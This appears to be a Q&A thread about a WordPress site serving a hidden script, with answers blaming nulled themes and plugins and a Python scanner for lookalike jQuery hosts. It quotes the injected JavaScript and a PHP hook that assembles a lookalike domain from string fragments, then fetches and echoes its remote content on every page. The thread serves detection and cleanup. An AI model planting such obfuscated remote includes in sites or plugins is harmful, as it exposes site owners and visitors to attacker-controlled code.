
Remove script from wordpress site

I am using Malwarebytes and every time I visit my WordPress site it blocks a script trying to run on the page. The script is:

<script type="text/javascript">
    if (!document.referrer || document.referrer == '') {
        document.write('<scr' + 'ipt type="text/javascript" src="http://www.jquerylibs.org/jquery.min.js"></scr' + 'ipt>');
    } else {
        document.write('<scr' + 'ipt type="text/javascript" src="http://www.jquerylibs.org/jquery.js"></scr' + 'ipt>');
    }
</script>

I'm not sure if it is malicious or not, but I would like to remove it. However, I do not know which plugin or file is causing it. I've tried looking at the page source, etc.

What does the script mean and is there a way to find out what's causing it?

Any help would be greatly appreciated.

You are using a WordPress plugin or theme that you probably downloaded from a repository of 'nulled' themes and plugins.

Almost all such websites use a business model whereby they offer premium themes and plugins, which normally cost $5-$75, for free.

But as the saying goes, there is no such thing as a free lunch. In exchange for the free plugin/theme, the website proprietor adds code which includes a js file from an outside domain which adds banners to your website.

To prevent the webmaster or developer from immediately noticing the banners (or just a back link or three), anyone logged in as admin and/or anyone without a referrer URL is not shown the advertisements.

In your case, the payload was being included from a domain which is similar to the real thing, thereby fooling enough inexperienced WordPress webmasters into taking it for something which belongs: jQuery. The official jQuery CDN is located at //code.jquery.com/

Make sure to check all themes or plugins from shady places for similar code, which may also be inside image files, though normally it is inside init.php or functions.php. Here is another example of similar code using a different variation of the jquery domain.

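if (!function_exists('wp_func_jquery')) {
    function wp_func_jquery() {
        // The remote URL is assembled from fragments, so a plain-text
        // search for the full domain name finds nothing in this file.
        $host = 'http://';
        $jquery = $host.'u'.'jquery.org/jquery-1.6.3.min.js';
        // Errors are suppressed with @; if the remote file is reachable,
        // its body is fetched and echoed into the page.
        if (@fopen($jquery,'r')){
            echo(wp_remote_retrieve_body(wp_remote_get($jquery)));
        }
    }
    // Runs on every front-end page load via the footer hook.
    add_action('wp_footer', 'wp_func_jquery');
}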

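You can search your WordPress directory for this script using one of the applications suggested in this question: Tools for searching for strings in files without indexing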
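A plain string search for the domain misses the second snippet above, because 'u'.'jquery.org' never appears as one string in the file. The following scanner is an added example, not code from the original answers: it joins split string literals first, then reports hostnames containing "jquery" that are not on an allowlist. The allowlist (only the official CDN named above), the file extensions and the function names are assumptions of this example.

```python
import os
import re
import sys

# Assumption: only the official CDN named in the answer is trusted.
ALLOWED_HOSTS = {"code.jquery.com"}
SCAN_EXTENSIONS = (".php", ".js", ".html", ".htm")

# Closing quote, '.' (PHP) or '+' (JS), opening quote: a split string literal.
CONCAT = re.compile(r"""['"]\s*[.+]\s*['"]""")
# A hostname that starts a literal or follows '//' and is followed by a path.
HOST = re.compile(r"""(?:(?<=//)|(?<=['"]))((?:[a-z0-9-]+\.)+[a-z]{2,})(?=/)""", re.I)


def suspicious_hosts(text):
    """Map each non-allowlisted host containing 'jquery' to whether it was
    hidden by string splitting (absent from the raw text)."""
    joined = CONCAT.sub("", text)  # 'u'.'jquery.org' -> 'ujquery.org'
    found = {}
    for host in HOST.findall(joined):
        host = host.lower()
        if "jquery" in host and host not in ALLOWED_HOSTS:
            found[host] = host not in text.lower()
    return found


def scan_tree(root):
    """Scan theme/plugin source files under root; return sorted findings."""
    results = []
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXTENSIONS):
                continue
            path = os.path.join(folder, name)
            with open(path, encoding="utf-8", errors="replace") as handle:
                hosts = suspicious_hosts(handle.read())
            results.extend((path, h, split) for h, split in hosts.items())
    return sorted(results)


if __name__ == "__main__":
    # Usage (path is a placeholder): python scan.py /path/to/wordpress
    for path, host, split in scan_tree(sys.argv[1]):
        print(f"{path}: {host}" + ("  [split string]" if split else ""))
```

This is a triage heuristic: it does not look inside image files, and each hit still needs a manual look at the reported file.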
